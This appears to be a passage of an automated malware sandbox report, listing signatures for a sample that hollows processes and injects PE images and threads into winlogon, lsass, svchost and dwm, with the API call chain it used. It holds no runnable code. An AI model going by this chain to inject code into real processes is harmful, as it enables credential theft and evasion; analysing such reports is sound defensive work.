Source: 37.2.powershell.exe.4040b0.1.raw.unpack, RunPE.cs Reference to suspicious API methods: NtSetContextThread(thread, intPtr5)
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dllhost.exe Code function: 40_2_0000000140002434 CreateProcessW,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,VirtualAlloc,Wow64GetThreadContext,WriteProcessMemory,Wow64SetThreadContext,OpenProcess,TerminateProcess, 40_2_0000000140002434
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe EIP: 8500000
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\winlogon.exe EIP: 91722EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\lsass.exe EIP: BDCB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 709A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: B1632EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: B1602EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: EFFC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: AFB82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6F7B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 7C382EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 82772EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 1B1D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6AD72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 6AD42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3CD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: D3CA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 73D32EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 21B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: BA662EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: B9FD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 54D82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 55342EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 57DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 57DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 33B72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 33B42EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 74532EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D8952EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C8542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 212A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6D542EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4332EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD9B2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8E72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 19362EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 31802EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA1C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D2562EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D1A02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B0FC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E552EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC5C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FAC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1A932EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 88F92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 857C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DEDC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A2112EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FBEC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C622EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59752EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB592EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F95A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9EEE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2B2E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC6E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8262EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2ED52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14DD2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 44F72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E6AF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 84C22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A0712EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4DDB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F4C92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A50F2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ACF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 85DA2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 54372EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7CDE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 94182EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 543A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9A22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 749D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9CB2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ADC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 85A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 85A82EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4192EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A41C2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 15425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11C25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BB25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4725AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4925AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8025AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4325AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4525AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 10F25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11125AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BC25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BE25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4225AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4425AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 21F22EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 21F52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 756E2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 75712EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6722EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C6752EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5462EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5492EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 448A2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 448D2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B9BC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B9BF2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A942EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3BA52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0942EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0992EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: E8A52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6102EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6152EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D9CC2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F4012EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4742EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4AE2EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ACC52EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: ACD72EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 88E02EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 71D92EBC
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\Conhost.exe EIP: 91062EBC
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 73E62EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 26DB1630000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
